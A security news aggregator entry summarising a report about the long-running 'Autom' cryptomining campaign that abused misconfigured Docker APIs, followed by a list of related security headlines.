Security News > 2021 > December > Cryptomining Attack Exploits Docker API Misconfiguration Since 2019

The attack technique is script-based and dubbed "Autom", because it exploits the file "Autom.sh".
Attackers have consistently abused the API misconfiguration during the campaign's active period, however the evasion tactics have varied - allowing adversaries to fly under the radar, wrote Aquasec's research arm Team Nautilus in a report published Wednesday.
Attackers hit honeypots set up by Team Nautilus 84 times since 2019, with 22 attacks in 2019, 58 in 2020, and four in 2021 before researchers began writing up their report in October, researchers said.
Though attackers use the same entry point and tactics to achieve their ultimate goal of cryptomining during the attack vector, what changed most about the attack over the years is how threat actors constantly have evolved evasive maneuvers to avoid detection, researchers said.
Attackers also have used five different servers to download the shell script that initiates the attack since they started, they said.
Team Nautilus first observed the attack in 2019 when a malicious command was executed during the run of a vanilla image alpine:latest, which downloaded the autom.
News URL
https://threatpost.com/cryptomining-attack-exploits-docker-api-misconfiguration-since-2019/177299/
Related news
- Threat Actors Exploit ClickFix to Deploy NetSupport RAT in Latest Cyber Attacks (source)
- FINALDRAFT Malware Exploits Microsoft Graph API for Espionage on Windows and Linux (source)
- SonicWall firewall bug leveraged in attacks after PoC exploit release (source)
- New “whoAMI” Attack Exploits AWS AMI Name Confusion for Remote Code Execution (source)
- Chinese Hackers Exploit MAVInject.exe to Evade Detection in Targeted Cyber Attacks (source)
- Ransomware gangs exploit Paragon Partition Manager bug in BYOVD attacks (source)
- Hackers Exploit Paragon Partition Manager Driver Vulnerability in Ransomware Attacks (source)
- Hackers Exploit AWS Misconfigurations to Launch Phishing Attacks via SES and WorkMail (source)
- Ongoing Cyber Attacks Exploit Critical Vulnerabilities in Cisco Smart Licensing Utility (source)
- Zero-Day Alert: Google Releases Chrome Patch for Exploit Used in Russian Espionage Attacks (source)